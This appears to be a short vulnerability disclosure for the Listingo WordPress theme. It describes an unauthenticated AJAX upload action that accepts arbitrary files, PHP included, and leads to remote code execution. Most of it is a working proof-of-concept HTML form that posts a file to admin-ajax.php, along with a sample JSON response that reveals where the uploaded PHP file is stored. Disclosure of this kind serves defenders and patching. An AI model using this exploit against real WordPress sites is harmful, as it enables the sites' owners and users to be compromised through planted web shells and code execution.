The theme does not validate files uploaded via an AJAX action (listingo_temp_uploader) that is available to unauthenticated users. This allows them to upload arbitrary files, including PHP, into the web root, which can lead to remote code execution (RCE).
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Listingo Unauthenticated File Upload</title>
</head>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
Upload a File:
<input type="file" name="listingo_uploader" id="listingo_uploader">
<input type="submit" name="submit" value="Start Upload">
</form>
</body>
</html>
The JSON response gives the path of the uploaded file, so no guessing of the stored filename is needed:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}